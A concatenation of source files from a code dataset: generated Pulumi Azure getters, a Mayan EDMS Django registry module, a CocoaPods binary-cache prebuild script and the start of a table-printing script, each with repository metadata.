def do_not_run_extensions_on_overprovisioned_vms(self) -> Optional[bool]:
return pulumi.get(self, "do_not_run_extensions_on_overprovisioned_vms")
@property
@pulumi.getter(name="extendedLocation")
def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:
return pulumi.get(self, "extended_location")
@property
@pulumi.getter(name="hostGroup")
def host_group(self) -> Optional['outputs.SubResourceResponse']:
return pulumi.get(self, "host_group")
@property
@pulumi.getter
def id(self) -> str:
return pulumi.get(self, "id")
@property
@pulumi.getter
def identity(self) -> Optional['outputs.VirtualMachineScaleSetIdentityResponse']:
return pulumi.get(self, "identity")
@property
@pulumi.getter
def location(self) -> str:
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="orchestrationMode")
def orchestration_mode(self) -> Optional[str]:
return pulumi.get(self, "orchestration_mode")
@property
@pulumi.getter
def overprovision(self) -> Optional[bool]:
return pulumi.get(self, "overprovision")
@property
@pulumi.getter
def plan(self) -> Optional['outputs.PlanResponse']:
return pulumi.get(self, "plan")
@property
@pulumi.getter(name="platformFaultDomainCount")
def platform_fault_domain_count(self) -> Optional[int]:
return pulumi.get(self, "platform_fault_domain_count")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="proximityPlacementGroup")
def proximity_placement_group(self) -> Optional['outputs.SubResourceResponse']:
return pulumi.get(self, "proximity_placement_group")
@property
@pulumi.getter(name="scaleInPolicy")
def scale_in_policy(self) -> Optional['outputs.ScaleInPolicyResponse']:
return pulumi.get(self, "scale_in_policy")
@property
@pulumi.getter(name="singlePlacementGroup")
def single_placement_group(self) -> Optional[bool]:
return pulumi.get(self, "single_placement_group")
@property
@pulumi.getter
def sku(self) -> Optional['outputs.SkuResponse']:
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="uniqueId")
def unique_id(self) -> str:
return pulumi.get(self, "unique_id")
@property
@pulumi.getter(name="upgradePolicy")
def upgrade_policy(self) -> Optional['outputs.UpgradePolicyResponse']:
return pulumi.get(self, "upgrade_policy")
@property
@pulumi.getter(name="virtualMachineProfile")
def virtual_machine_profile(self) -> Optional['outputs.VirtualMachineScaleSetVMProfileResponse']:
return pulumi.get(self, "virtual_machine_profile")
@property
@pulumi.getter(name="zoneBalance")
def zone_balance(self) -> Optional[bool]:
return pulumi.get(self, "zone_balance")
@property
@pulumi.getter
def zones(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "zones")
class AwaitableGetVirtualMachineScaleSetResult(GetVirtualMachineScaleSetResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVirtualMachineScaleSetResult(
additional_capabilities=self.additional_capabilities,
automatic_repairs_policy=self.automatic_repairs_policy,
do_not_run_extensions_on_overprovisioned_vms=self.do_not_run_extensions_on_overprovisioned_vms,
extended_location=self.extended_location,
host_group=self.host_group,
id=self.id,
identity=self.identity,
location=self.location,
name=self.name,
orchestration_mode=self.orchestration_mode,
overprovision=self.overprovision,
plan=self.plan,
platform_fault_domain_count=self.platform_fault_domain_count,
provisioning_state=self.provisioning_state,
proximity_placement_group=self.proximity_placement_group,
scale_in_policy=self.scale_in_policy,
single_placement_group=self.single_placement_group,
sku=self.sku,
tags=self.tags,
type=self.type,
unique_id=self.unique_id,
upgrade_policy=self.upgrade_policy,
virtual_machine_profile=self.virtual_machine_profile,
zone_balance=self.zone_balance,
zones=self.zones)
def get_virtual_machine_scale_set(expand: Optional[str] = None,
resource_group_name: Optional[str] = None,
vm_scale_set_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVirtualMachineScaleSetResult:
__args__ = dict()
__args__['expand'] = expand
__args__['resourceGroupName'] = resource_group_name
__args__['vmScaleSetName'] = vm_scale_set_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:compute:getVirtualMachineScaleSet', __args__, opts=opts, typ=GetVirtualMachineScaleSetResult).value
return AwaitableGetVirtualMachineScaleSetResult(
additional_capabilities=__ret__.additional_capabilities,
automatic_repairs_policy=__ret__.automatic_repairs_policy,
do_not_run_extensions_on_overprovisioned_vms=__ret__.do_not_run_extensions_on_overprovisioned_vms,
extended_location=__ret__.extended_location,
host_group=__ret__.host_group,
id=__ret__.id,
identity=__ret__.identity,
location=__ret__.location,
name=__ret__.name,
orchestration_mode=__ret__.orchestration_mode,
overprovision=__ret__.overprovision,
plan=__ret__.plan,
platform_fault_domain_count=__ret__.platform_fault_domain_count,
provisioning_state=__ret__.provisioning_state,
proximity_placement_group=__ret__.proximity_placement_group,
scale_in_policy=__ret__.scale_in_policy,
single_placement_group=__ret__.single_placement_group,
sku=__ret__.sku,
tags=__ret__.tags,
type=__ret__.type,
unique_id=__ret__.unique_id,
upgrade_policy=__ret__.upgrade_policy,
virtual_machine_profile=__ret__.virtual_machine_profile,
zone_balance=__ret__.zone_balance,
zones=__ret__.zones)
| true | true |
790122bb8ebca2360dd6388ed475881db457f27e | 7,733 | py | Python | mayan/apps/common/classes.py | marumadang/mayan-edms | 2052caada456306ae29b46c4885e45d9a26baaaa | [
"Apache-2.0"
] | null | null | null | mayan/apps/common/classes.py | marumadang/mayan-edms | 2052caada456306ae29b46c4885e45d9a26baaaa | [
"Apache-2.0"
] | null | null | null | mayan/apps/common/classes.py | marumadang/mayan-edms | 2052caada456306ae29b46c4885e45d9a26baaaa | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from django.apps import apps
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.translation import ugettext
@python_2_unicode_compatible
class Collection(object):
    """A registered, orderable grouping of model instances for display.

    Every instantiation appends itself to the class-wide ``_registry`` so
    that all collections can later be listed via ``get_all()``.
    """
    _registry = []

    @classmethod
    def get_all(cls):
        """Return every registered collection, sorted by its ``_order``."""
        return sorted(cls._registry, key=lambda collection: collection._order)

    def __init__(self, label, icon=None, link=None, queryset=None, model=None, order=None):
        self._label = label
        self._icon = icon
        self._link = link
        self._queryset = queryset
        self._model = model
        # Collections without an explicit order sink to the bottom (99).
        self._order = order or 99
        self.__class__._registry.append(self)

    def __str__(self):
        return force_text(self.label)

    def resolve(self):
        """Materialize display attributes (children, icon, label, url).

        Returns an empty string so the call can be embedded in templates.
        """
        self.children = self._get_children()
        self.icon = self._icon
        self.label = self._label
        self.url = None
        if not self._link:
            return ''
        # A link may carry its own icon; fall back to the collection's.
        self.icon = getattr(self._link, 'icon', self._icon)
        self.url = reverse(viewname=self._link.view, args=self._link.args)
        return ''

    def _get_children(self):
        # An explicit queryset wins over the model's default manager.
        if self._queryset:
            return self._queryset
        if self._model:
            return self._model.objects.all()
class Dashboard(object):
    """Named container of dashboard widgets, kept in a class-wide registry."""
    _registry = {}

    @classmethod
    def get(cls, name):
        """Return the dashboard registered under ``name``."""
        return cls._registry[name]

    def __init__(self, name, label):
        self.name = name
        self.label = label
        self.widgets = {}
        self.removed_widgets = []
        self.__class__._registry[name] = self

    def add_widget(self, widget, order=0):
        """Register ``widget`` on this dashboard at the given ``order``."""
        self.widgets[widget] = {'widget': widget, 'order': order}

    def get_widgets(self):
        """
        Returns a list of widgets sorted by their 'order'.
        If two or more widgets have the same 'order', sort by label.
        """
        entries = sorted(
            self.widgets.values(),
            key=lambda entry: (entry['order'], entry['widget'].label)
        )
        return (
            entry['widget'] for entry in entries
            if entry['widget'] not in self.removed_widgets
        )

    def remove_widget(self, widget):
        """Hide ``widget`` from subsequent ``get_widgets`` calls."""
        self.removed_widgets.append(widget)
class DashboardWidget(object):
    """Declarative description of a single dashboard widget."""
    _registry = []

    @classmethod
    def get_all(cls):
        """Return every widget registered so far, in registration order."""
        return cls._registry

    def __init__(self, label, func=None, icon=None, link=None, queryset=None, statistic_slug=None):
        self.label = label
        self.func = func
        self.icon = icon
        self.link = link
        self.queryset = queryset
        self.statistic_slug = statistic_slug
        self.__class__._registry.append(self)
@python_2_unicode_compatible
class ModelAttribute(object):
    """Registry of named attributes (fields or virtual attributes) per model.

    Attributes are grouped under a ``type_name`` so callers can request
    only certain kinds of attributes for a given model.
    """
    __registry = {}

    @classmethod
    def get_for(cls, model, type_names=None):
        """Return the attributes registered for ``model``.

        When ``type_names`` is given, only attributes registered under one
        of those type names are included. ``model`` may also be a model
        instance, in which case the lookup is retried with its class.
        """
        result = []
        try:
            # Bug fix: a missing registry key raises KeyError, not the
            # IndexError the original code caught; .iteritems() was also
            # Python 2 only.
            for type_name, attributes in cls.__registry[model].items():
                if not type_names or type_name in type_names:
                    result.extend(attributes)
            return result
        except KeyError:
            # We were passed a model instance; try again using the model of
            # the instance. If we already have the model class, re-raise.
            if model.__class__ == models.base.ModelBase:
                raise
            # Bug fix: the original subscripted the bound method
            # (``cls.get_for[type(model)]``) instead of calling it.
            return cls.get_for(type(model), type_names=type_names)

    @classmethod
    def get_choices_for(cls, model, type_names=None):
        """Return ``(name, attribute)`` pairs suitable for form choices."""
        return [
            (
                attribute.name, attribute
            ) for attribute in cls.get_for(model, type_names)
        ]

    @classmethod
    def help_text_for(cls, model, type_names=None):
        """Return a numbered, human readable summary of the attributes."""
        result = []
        for count, attribute in enumerate(cls.get_for(model, type_names), 1):
            result.append(
                '{}) {}'.format(
                    count, force_text(attribute.get_display(show_name=True))
                )
            )
        return ' '.join(
            [ugettext('Available attributes: \n'), ', \n'.join(result)]
        )

    def get_display(self, show_name=False):
        """Return the label (or internal name) plus optional description."""
        if self.description:
            return '{} - {}'.format(
                self.name if show_name else self.label, self.description
            )
        else:
            return force_text(self.name if show_name else self.label)

    def __str__(self):
        return self.get_display()

    def __init__(self, model, name, label=None, description=None, type_name=None):
        self.model = model
        self.label = label
        self.name = name
        self.description = description
        # When the attribute matches a concrete model field, inherit the
        # field's verbose name and help text.
        for field in model._meta.fields:
            if field.name == name:
                self.label = field.verbose_name
                self.description = field.help_text
        self.__registry.setdefault(model, {})
        # ``type_name`` may be a single name or a list of names.
        if isinstance(type_name, list):
            for single_type in type_name:
                self.__registry[model].setdefault(single_type, [])
                self.__registry[model][single_type].append(self)
        else:
            self.__registry[model].setdefault(type_name, [])
            self.__registry[model][type_name].append(self)
class MissingItem(object):
    """A setup item that may be missing, shown with a condition and fix view."""
    _registry = []

    @classmethod
    def get_all(cls):
        """Return every registered missing-item check."""
        return cls._registry

    def __init__(self, label, condition, description, view):
        self.label = label
        self.condition = condition
        self.description = description
        self.view = view
        type(self)._registry.append(self)
@python_2_unicode_compatible
class Filter(object):
    """A named, registered queryset filter with optional ACL enforcement."""
    _registry = {}

    @classmethod
    def get(cls, slug):
        """Return the filter registered under ``slug``."""
        return cls._registry[slug]

    @classmethod
    def all(cls):
        """Return the slug -> filter registry mapping."""
        return cls._registry

    def __init__(self, label, slug, filter_kwargs, model, object_permission=None, hide_links=False):
        self.label = label
        self.slug = slug
        self.filter_kwargs = filter_kwargs
        self.model = model
        self.object_permission = object_permission
        self.hide_links = hide_links
        self.__class__._registry[self.slug] = self

    def __str__(self):
        return force_text(self.label)

    def get_queryset(self, user):
        """Return the filtered queryset, restricted by ACLs when configured."""
        AccessControlList = apps.get_model(
            app_label='acls', model_name='AccessControlList'
        )
        queryset = self.model.objects.all()
        for kwargs in self.filter_kwargs:
            queryset = queryset.filter(**kwargs)
        queryset = queryset.distinct()
        if not self.object_permission:
            return queryset
        return AccessControlList.objects.filter_by_access(
            self.object_permission, user, queryset=queryset
        )
class Package(object):
    """A third-party package whose license text must be displayed."""
    _registry = []

    @classmethod
    def get_all(cls):
        """Return every registered package."""
        return cls._registry

    def __init__(self, label, license_text):
        self.label = label
        self.license_text = license_text
        type(self)._registry.append(self)
class PropertyHelper(object):
    """
    Makes adding fields using __class__.add_to_class easier.
    Each subclass must implement the `constructor` and the `get_result`
    method.
    """
    # NOTE(review): stacking @staticmethod over @property is unusual; as
    # written, `constructor` is a staticmethod wrapping a property object.
    # Presumably it is consumed via Django's Model.add_to_class -- confirm
    # before restructuring.
    @staticmethod
    @property
    def constructor(source_object):
        return PropertyHelper(source_object)
    def __init__(self, instance):
        # The object whose attribute access this helper proxies.
        self.instance = instance
    def __getattr__(self, name):
        # Any unknown attribute is resolved through get_result().
        return self.get_result(name=name)
    def get_result(self, name):
        """
        The method that produces the actual result. Must be implemented
        by each subclass.
        """
        raise NotImplementedError
| 27.916968 | 100 | 0.604423 | from __future__ import unicode_literals
from django.apps import apps
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.translation import ugettext
@python_2_unicode_compatible
class Collection(object):
_registry = []
@classmethod
def get_all(cls):
return sorted(cls._registry, key=lambda entry: entry._order)
def __init__(self, label, icon=None, link=None, queryset=None, model=None, order=None):
self._label = label
self._icon = icon
self._link = link
self._queryset = queryset
self._model = model
self._order = order or 99
self.__class__._registry.append(self)
def __str__(self):
return force_text(self.label)
def resolve(self):
self.children = self._get_children()
self.icon = self._icon
self.label = self._label
self.url = None
if self._link:
self.icon = getattr(self._link, 'icon', self._icon)
self.url = reverse(viewname=self._link.view, args=self._link.args)
return ''
def _get_children(self):
if self._queryset:
return self._queryset
else:
if self._model:
return self._model.objects.all()
class Dashboard(object):
_registry = {}
@classmethod
def get(cls, name):
return cls._registry[name]
def __init__(self, name, label):
self.name = name
self.label = label
self.widgets = {}
self.removed_widgets = []
self.__class__._registry[name] = self
def add_widget(self, widget, order=0):
self.widgets[widget] = {'widget': widget, 'order': order}
def get_widgets(self):
return map(
lambda x: x['widget'],
filter(
lambda x: x['widget'] not in self.removed_widgets,
sorted(
self.widgets.values(),
key=lambda x: (x['order'], x['widget'].label)
)
)
)
def remove_widget(self, widget):
self.removed_widgets.append(widget)
class DashboardWidget(object):
_registry = []
@classmethod
def get_all(cls):
return cls._registry
def __init__(self, label, func=None, icon=None, link=None, queryset=None, statistic_slug=None):
self.label = label
self.icon = icon
self.link = link
self.queryset = queryset
self.func = func
self.statistic_slug = statistic_slug
self.__class__._registry.append(self)
@python_2_unicode_compatible
class ModelAttribute(object):
__registry = {}
@classmethod
def get_for(cls, model, type_names=None):
result = []
try:
for type_name, attributes in cls.__registry[model].iteritems():
if not type_names or type_name in type_names:
result.extend(attributes)
return result
except IndexError:
if model.__class__ == models.base.ModelBase:
raise
return cls.get_for[type(model)]
@classmethod
def get_choices_for(cls, model, type_names=None):
return [
(
attribute.name, attribute
) for attribute in cls.get_for(model, type_names)
]
@classmethod
def help_text_for(cls, model, type_names=None):
result = []
for count, attribute in enumerate(cls.get_for(model, type_names), 1):
result.append(
'{}) {}'.format(
count, force_text(attribute.get_display(show_name=True))
)
)
return ' '.join(
[ugettext('Available attributes: \n'), ', \n'.join(result)]
)
def get_display(self, show_name=False):
if self.description:
return '{} - {}'.format(
self.name if show_name else self.label, self.description
)
else:
return force_text(self.name if show_name else self.label)
def __str__(self):
return self.get_display()
def __init__(self, model, name, label=None, description=None, type_name=None):
self.model = model
self.label = label
self.name = name
self.description = description
for field in model._meta.fields:
if field.name == name:
self.label = field.verbose_name
self.description = field.help_text
self.__registry.setdefault(model, {})
if isinstance(type_name, list):
for single_type in type_name:
self.__registry[model].setdefault(single_type, [])
self.__registry[model][single_type].append(self)
else:
self.__registry[model].setdefault(type_name, [])
self.__registry[model][type_name].append(self)
class MissingItem(object):
_registry = []
@classmethod
def get_all(cls):
return cls._registry
def __init__(self, label, condition, description, view):
self.label = label
self.condition = condition
self.description = description
self.view = view
self.__class__._registry.append(self)
@python_2_unicode_compatible
class Filter(object):
_registry = {}
@classmethod
def get(cls, slug):
return cls._registry[slug]
@classmethod
def all(cls):
return cls._registry
def __init__(self, label, slug, filter_kwargs, model, object_permission=None, hide_links=False):
self.label = label
self.slug = slug
self.filter_kwargs = filter_kwargs
self.model = model
self.object_permission = object_permission
self.hide_links = hide_links
self.__class__._registry[self.slug] = self
def __str__(self):
return force_text(self.label)
def get_queryset(self, user):
AccessControlList = apps.get_model(
app_label='acls', model_name='AccessControlList'
)
queryset = self.model.objects.all()
for kwargs in self.filter_kwargs:
queryset = queryset.filter(**kwargs)
queryset = queryset.distinct()
if self.object_permission:
return AccessControlList.objects.filter_by_access(
self.object_permission, user, queryset=queryset
)
else:
return queryset
class Package(object):
_registry = []
@classmethod
def get_all(cls):
return cls._registry
def __init__(self, label, license_text):
self.label = label
self.license_text = license_text
self.__class__._registry.append(self)
class PropertyHelper(object):
@staticmethod
@property
def constructor(source_object):
return PropertyHelper(source_object)
def __init__(self, instance):
self.instance = instance
def __getattr__(self, name):
return self.get_result(name=name)
def get_result(self, name):
raise NotImplementedError
| true | true |
7901230dea21b8daba0a85ea609adab8279744ba | 7,091 | py | Python | lib/command/PythonScripts/prebuild_lib.py | qalandarov/cocoapods-binary-cache | bf1fadc3d9dbd8fb260a83e9ddbb6fd8a17ee0b8 | [
"MIT"
] | null | null | null | lib/command/PythonScripts/prebuild_lib.py | qalandarov/cocoapods-binary-cache | bf1fadc3d9dbd8fb260a83e9ddbb6fd8a17ee0b8 | [
"MIT"
] | null | null | null | lib/command/PythonScripts/prebuild_lib.py | qalandarov/cocoapods-binary-cache | bf1fadc3d9dbd8fb260a83e9ddbb6fd8a17ee0b8 | [
"MIT"
] | null | null | null | # Copyright 2019 Grabtaxi Holdings PTE LTE (GRAB), All rights reserved.
# Use of this source code is governed by an MIT-style license that can be found in the LICENSE file
import subprocess
import re
import os
import glob
from utils.fileutils import FileUtils
from utils.ziputils import ZipUtils
from functools import wraps
from utils.logger import logger
from utils.step import step
# PREBUILD POD LIBS FLOW
# On a normal build, this automatically:
# 1. Fetches the binary cache from a separate repo and unzips it into the pod-binary folder.
# 2. pod-binary hooks `pod install`, which then uses those cached libraries.
# When upgrading a library, you need to:
# 1. Run this script to prebuild/delete the libs which have changed.
# 2. Commit the binary changes to the cache repo and set a tag for it.
# 3. Update the tag in this file, then submit a new MR.
def print_func_name(func):
    """Decorator that logs the wrapped callable's name before invoking it."""
    @wraps(func)
    def wrapper(*args, **kwargs):
        logger.info('🚀 Start func: {}'.format(func.__name__))
        return func(*args, **kwargs)
    return wrapper
class PrebuildLib:
    """Manage prebuilt CocoaPods binary caches stored in git repositories.

    Wraps the fetch / unzip / rebuild / push cycle for both the regular pod
    cache and the development-pod (devpod) cache.
    """

    def __init__(self, config):
        # All paths/repos come from the injected config object.
        self.cache_repo = config.cache_repo
        self.cache_path = config.cache_path
        self.prebuild_path = config.prebuild_path
        self.generated_dir_name = config.generated_dir_name
        self.delta_path = config.delta_path
        self.manifest_file = config.manifest_file
        self.devpod_cache_repo = config.devpod_cache_repo
        self.devpod_cache_path = config.devpod_cache_path
        self.devpod_prebuild_output = config.devpod_prebuild_output
        self.generated_path = config.generated_path
        self.cache_libs_path = config.cache_libs_path
        self.devpod_cache_libs_path = config.devpod_cache_libs_path

    @print_func_name
    def zip_to_cache(self, libName):
        """Zip one generated framework into the cache, unless already cached."""
        if os.path.exists(self.cache_libs_path + libName + '.zip'):
            logger.info('Warning: lib {} already exist'.format(libName))
        else:
            ZipUtils.zip_dir(
                '{}/{}'.format(self.generated_path, libName),
                '{}/{}.zip'.format(self.cache_libs_path, libName)
            )

    @print_func_name
    def clean_cache(self, libName):
        """Remove a library's zip from the cache (no-op if absent)."""
        FileUtils.remove_file(self.cache_libs_path + libName + ".zip")

    @print_func_name
    def zip_all_libs_to_cache(self):
        """Re-zip every generated framework into the cache, plus the manifest."""
        os.system('rm -rf ' + self.cache_libs_path + '/*')
        FileUtils.create_dir(self.cache_libs_path)
        # Renamed loop variable: ``dir`` shadowed the builtin.
        for lib_dir in FileUtils.listdir_nohidden(self.generated_path):
            ZipUtils.zip_dir(self.generated_path + '/' + lib_dir, self.cache_libs_path + '/' + lib_dir + '.zip')
        FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file, self.cache_path)

    def clean_and_pull(self, git_repo_dir):
        """Discard local changes in ``git_repo_dir`` and update master."""
        subprocess.run(['git', '-C', git_repo_dir, 'reset', '--hard'])
        subprocess.run(['git', '-C', git_repo_dir, 'clean', '-df'])
        subprocess.run(['git', '-C', git_repo_dir, 'checkout', 'master'])
        subprocess.run(['git', '-C', git_repo_dir, 'pull', '-X', 'theirs'])

    @print_func_name
    def fetch_cache(self):
        """Clone the cache repo, or reset and update an existing checkout."""
        with step('fetch_prebuild_libs'):
            if not os.path.exists(self.cache_path):
                subprocess.run(['git', 'clone', '--depth=1', self.cache_repo, self.cache_path])
            else:
                self.clean_and_pull(self.cache_path)

    @print_func_name
    def unzip_cache(self):
        """Unzip all cached frameworks into the local prebuild directory."""
        with step('unzip_prebuild_libs'):
            FileUtils.remove_dir(self.prebuild_path)
            FileUtils.create_dir(self.generated_path)
            FileUtils.copy_file_or_dir(self.cache_path + self.manifest_file, self.prebuild_path)
            # Unzip libs to pod-binary folder
            for zipPath in glob.iglob(self.cache_libs_path + '/*.zip'):
                ZipUtils.unzip(zipPath, self.generated_path)

    @print_func_name
    def fetch_and_apply_cache(self):
        """Fetch the cache repo and unpack it locally."""
        self.fetch_cache()
        self.unzip_cache()

    @print_func_name
    def fetch_and_apply_devpod_cache(self):
        """Fetch the devpod cache repo and unpack it into the prebuild dir."""
        with step('fetch_and_apply_devpod_cache'):
            logger.info('Fetching devpod cache to {}'.format(self.devpod_cache_path))
            if not os.path.exists(self.devpod_cache_path):
                subprocess.run(['git', 'clone', '--depth=1', self.devpod_cache_repo, self.devpod_cache_path])
            else:
                self.clean_and_pull(self.devpod_cache_path)
            # Unzip devpod libs
            devpod_temp_dir = self.prebuild_path + 'devpod/'
            logger.info('Unzip from: {} to: {}'.format(self.devpod_cache_libs_path, devpod_temp_dir))
            for zip_path in glob.iglob(self.devpod_cache_libs_path + '/*.zip'):
                ZipUtils.unzip(zip_path, devpod_temp_dir)

    @print_func_name
    def has_libs_change(self):
        """Return True when a delta file exists (some frameworks changed)."""
        return os.path.exists(self.delta_path)

    def push_all_to_git(self, git_dir):
        """Commit and push everything inside ``git_dir``.

        Bug fix: this previously ignored ``git_dir`` and always operated on
        ``self.cache_path`` (its only call site passed that same path, so
        behavior for existing callers is unchanged).
        """
        git_input_path = 'git -C ' + git_dir
        os.system('{} add .'.format(git_input_path))
        os.system('{} commit -m "Prebuild pod libs"'.format(git_input_path))
        os.system('{} push'.format(git_input_path))

    @print_func_name
    def prebuild_if_needed(self):
        """Run pod install and sync any changed frameworks back to the cache."""
        self.fetch_and_apply_cache()
        subprocess.run(['bundle', 'exec', 'pod', 'install'], check=True)
        # Sync with cache directory
        if not os.path.isfile(self.delta_path):
            logger.info('No change in prebuilt frameworks')
            return
        # (Removed a no-op ``except Exception as e: raise e`` wrapper.)
        with open(self.delta_path) as f:
            FileUtils.create_dir(self.cache_path)
            data = f.read()
            data = re.sub('"', '', data)
            updatedMatches = re.findall(r'Updated: \[(.*)\]', data)
            if updatedMatches:
                updated = updatedMatches[0].strip()
                logger.info("Updated frameworks: {}".format(updated))
                if len(updated):
                    libs = updated.split(',')
                    for lib in libs:
                        libName = lib.strip()
                        self.clean_cache(libName)
                        self.zip_to_cache(libName)
            deletedMatches = re.findall(r'Deleted: \[(.*)\]', data)
            if deletedMatches:
                deleted = deletedMatches[0].strip()
                logger.info('Deleted frameworks: {}'.format(deleted))
                if len(deleted):
                    libs = deleted.split(',')
                    for lib in libs:
                        self.clean_cache(lib.strip())
        # Copy manifest file
        FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file, self.cache_path)
        self.push_all_to_git(self.cache_path)

    @print_func_name
    def prebuild_devpod(self):
        """Prebuild development pods on top of the regular cache."""
        self.fetch_and_apply_cache()
        self.fetch_and_apply_devpod_cache()
        subprocess.run(['bundle', 'exec', 'fastlane', 'run', 'cocoapods', 'try_repo_update_on_error:true'], check=True)
| 41.711765 | 119 | 0.624313 |
import subprocess
import re
import os
import glob
from utils.fileutils import FileUtils
from utils.ziputils import ZipUtils
from functools import wraps
from utils.logger import logger
from utils.step import step
def print_func_name(func):
@wraps(func)
def echo_func(*func_args, **func_kwargs):
logger.info('🚀 Start func: {}'.format(func.__name__))
return func(*func_args, **func_kwargs)
return echo_func
class PrebuildLib:
def __init__(self, config):
self.cache_repo = config.cache_repo
self.cache_path = config.cache_path
self.prebuild_path = config.prebuild_path
self.generated_dir_name = config.generated_dir_name
self.delta_path = config.delta_path
self.manifest_file = config.manifest_file
self.devpod_cache_repo = config.devpod_cache_repo
self.devpod_cache_path = config.devpod_cache_path
self.devpod_prebuild_output = config.devpod_prebuild_output
self.generated_path = config.generated_path
self.cache_libs_path = config.cache_libs_path
self.devpod_cache_libs_path = config.devpod_cache_libs_path
@print_func_name
def zip_to_cache(self, libName):
if os.path.exists(self.cache_libs_path + libName + '.zip'):
logger.info('Warning: lib {} already exist'.format(libName))
else:
ZipUtils.zip_dir(
'{}/{}'.format(self.generated_path, libName),
'{}/{}.zip'.format(self.cache_libs_path, libName)
)
@print_func_name
def clean_cache(self, libName):
FileUtils.remove_file(self.cache_libs_path + libName + ".zip")
@print_func_name
def zip_all_libs_to_cache(self):
os.system('rm -rf ' + self.cache_libs_path + '/*')
FileUtils.create_dir(self.cache_libs_path)
for dir in FileUtils.listdir_nohidden(self.generated_path):
ZipUtils.zip_dir(self.generated_path + '/' + dir, self.cache_libs_path + '/' + dir + '.zip')
FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file, self.cache_path)
def clean_and_pull(self, git_repo_dir):
subprocess.run(['git', '-C', git_repo_dir, 'reset', '--hard'])
subprocess.run(['git', '-C', git_repo_dir, 'clean', '-df'])
subprocess.run(['git', '-C', git_repo_dir, 'checkout', 'master'])
subprocess.run(['git', '-C', git_repo_dir, 'pull', '-X', 'theirs'])
@print_func_name
def fetch_cache(self):
with step('fetch_prebuild_libs'):
if not os.path.exists(self.cache_path):
subprocess.run(['git', 'clone', '--depth=1', self.cache_repo, self.cache_path])
else:
self.clean_and_pull(self.cache_path)
@print_func_name
def unzip_cache(self):
with step('unzip_prebuild_libs'):
FileUtils.remove_dir(self.prebuild_path)
FileUtils.create_dir(self.generated_path)
FileUtils.copy_file_or_dir(self.cache_path + self.manifest_file, self.prebuild_path)
for zipPath in glob.iglob(self.cache_libs_path + '/*.zip'):
ZipUtils.unzip(zipPath, self.generated_path)
@print_func_name
def fetch_and_apply_cache(self):
self.fetch_cache()
self.unzip_cache()
@print_func_name
def fetch_and_apply_devpod_cache(self):
with step('fetch_and_apply_devpod_cache'):
logger.info('Fetching devpod cache to {}'.format(self.devpod_cache_path))
if not os.path.exists(self.devpod_cache_path):
subprocess.run(['git', 'clone', '--depth=1', self.devpod_cache_repo, self.devpod_cache_path])
else:
self.clean_and_pull(self.devpod_cache_path)
devpod_temp_dir = self.prebuild_path + 'devpod/'
logger.info('Unzip from: {} to: {}'.format(self.devpod_cache_libs_path, devpod_temp_dir))
for zip_path in glob.iglob(self.devpod_cache_libs_path + '/*.zip'):
ZipUtils.unzip(zip_path, devpod_temp_dir)
@print_func_name
def has_libs_change(self):
if os.path.exists(self.delta_path):
return True
return False
def push_all_to_git(self, git_dir):
git_input_path = 'git -C ' + self.cache_path
os.system('{} add .'.format(git_input_path))
os.system('{} commit -m "Prebuild pod libs"'.format(git_input_path))
os.system('{} push'.format(git_input_path))
@print_func_name
def prebuild_if_needed(self):
self.fetch_and_apply_cache()
subprocess.run(['bundle', 'exec', 'pod', 'install'], check=True)
if not os.path.isfile(self.delta_path):
logger.info('No change in prebuilt frameworks')
return
try:
with open(self.delta_path) as f:
FileUtils.create_dir(self.cache_path)
data = f.read()
data = re.sub('"', '', data)
updatedMatches = re.findall(r'Updated: \[(.*)\]', data)
if updatedMatches:
updated = updatedMatches[0].strip()
logger.info("Updated frameworks: {}".format(updated))
if len(updated):
libs = updated.split(',')
for lib in libs:
libName = lib.strip()
self.clean_cache(libName)
self.zip_to_cache(libName)
deletedMatches = re.findall(r'Deleted: \[(.*)\]', data)
if deletedMatches:
deleted = deletedMatches[0].strip()
logger.info('Deleted frameworks: {}'.format(deleted))
if len(deleted):
libs = deleted.split(',')
for lib in libs:
self.clean_cache(lib.strip())
# Copy manifest file
FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file, self.cache_path)
self.push_all_to_git(self.cache_path)
except Exception as e:
raise e
@print_func_name
def prebuild_devpod(self):
self.fetch_and_apply_cache()
self.fetch_and_apply_devpod_cache()
subprocess.run(['bundle', 'exec', 'fastlane', 'run', 'cocoapods', 'try_repo_update_on_error:true'], check=True)
| true | true |
79012342a58987c1a94702b57c773254489bb8ac | 8,527 | py | Python | utd/script.py | bmccary/utd | 0c21aea1136403279c80c0db041cb8107d96e781 | [
"MIT"
] | null | null | null | utd/script.py | bmccary/utd | 0c21aea1136403279c80c0db041cb8107d96e781 | [
"MIT"
] | null | null | null | utd/script.py | bmccary/utd | 0c21aea1136403279c80c0db041cb8107d96e781 | [
"MIT"
] | null | null | null |
from prettytable import PrettyTable
from collections import OrderedDict
def _fieldnames(rows):
    """Return the union of keys across ``rows``, in first-seen order."""
    seen = OrderedDict()
    for row in rows:
        for key in row:
            seen[key] = None
    return list(seen)
def _echo_table(rows):
    """Pretty-print ``rows`` (a list of dicts) as a left-aligned table."""
    if not rows:
        return
    fieldnames = _fieldnames(rows)
    table = PrettyTable(fieldnames)
    table.align = 'l'
    for row in rows:
        # Missing/None values render as empty cells.
        table.add_row([row[key] or '' for key in fieldnames])
    click.echo(table.get_string())
def _echo_row(row):
